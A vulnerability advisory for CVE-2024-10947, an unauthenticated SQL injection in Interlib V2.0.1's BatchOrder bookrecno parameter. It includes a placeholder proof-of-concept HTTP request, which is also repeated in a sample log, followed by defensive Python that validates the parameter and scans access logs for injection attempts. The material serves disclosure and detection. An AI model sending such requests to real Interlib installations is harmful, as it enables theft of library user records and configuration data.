[Original] (CVE-2024-10947) Guangzhou Tuchuang Computer Software Development Co., Ltd. Library Cluster Management System (Interlib) <= V2.0.1 BatchOrder SQL Injection Vulnerability
Time: 2024-10-28 15:40:35
CVE-2024-10947
Created: 11/06/2024 09:36 PM
Updated: 11/07/2024 01:31 PM
Changes: 11/06/2024 09:36 PM (57), 11/07/2024 10:13 AM (30), 11/07/2024 01:31 PM (1)
Submitter: 高小白@wiki
Vulnerability Description
Guangzhou Tuchuang Computer Software Development Co., Ltd. is a high-tech enterprise combining product research and development, application integration, and customer service. Its main business is the design, integration, and maintenance of application software systems for users in the library industry.
The /interlib/order/BatchOrder module of the Interlib Library Cluster Automation Management System V2.0.1 (referred to as "Interlib V2.0.1") contains a SQL injection vulnerability. The module does not properly filter or validate user-supplied input before embedding it in SQL statements, so an attacker can craft a malicious value and execute unauthorized database queries. An unauthenticated attacker can use this vulnerability to read sensitive information from the database, such as the library's configuration data and user records.
POC

```http
GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=-1<Encode> and#inject#--</Encode> HTTP/1.1
Host: target-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=9EFCA7209FCB0D1C3B8866575F370B38; loginid="ikj3/fdi/YQ="; JSESSIONID=50BA98F89EB38EF3B7A363EEFA31A4F3; isHaveAsk=false
Connection: close
```
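The injection point is the `bookrecno` parameter, which in normal use carries a numeric record id. The following is an added example (not part of the advisory and not Interlib's own code) showing an input check a fix would apply, plus a detector that runs the same check over web-server access logs to find requests of the shape in the POC; the combined-log format and the sample log lines are constructed, and treating `bookrecno` as an integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

BATCHORDER_PATH = "/interlib/order/BatchOrder"

# Assumed Apache/nginx "combined" log layout: client, ident, user, [time], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def bookrecno_is_valid(value: str) -> bool:
    """Assumption: a record number is a plain (optionally negative) integer.
    Anything else (spaces, quotes, comment markers) cannot be a legitimate id."""
    return re.fullmatch(r"-?\d+", value) is not None

def check_request_target(target: str):
    """Return (is_suspicious, reason) for one request target (path + query string)."""
    parts = urlsplit(target)
    if parts.path != BATCHORDER_PATH:
        return False, "not BatchOrder"
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx once
    for raw in query.get("bookrecno", []):
        value = unquote(raw)  # second decode catches double-encoded payloads
        if not bookrecno_is_valid(value):
            return True, f"non-numeric bookrecno: {value!r}"
    return False, "ok"

def scan_log(lines):
    """Return (client_ip, target, reason) for every suspicious BatchOrder request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        suspicious, reason = check_request_target(m.group("target"))
        if suspicious:
            hits.append((m.group("ip"), m.group("target"), reason))
    return hits

# Constructed sample log: one benign lookup, one request mirroring the POC placeholder
# ("-1 and #inject#--", URL-encoded as a client would send it), one unrelated page.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2024:15:40:35 +0800] "GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=12345 HTTP/1.1" 200 4821',
    '198.51.100.7 - - [28/Oct/2024:15:41:02 +0800] "GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=-1%20and%20%23inject%23-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Oct/2024:15:41:10 +0800] "GET /interlib/index.jsp HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, target, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {reason} in {target}")
```

The same `bookrecno_is_valid` check, applied server-side before the value reaches the query (together with a parameterized query rather than string concatenation), is the mitigation; the log scan is for finding attempts against unpatched instances.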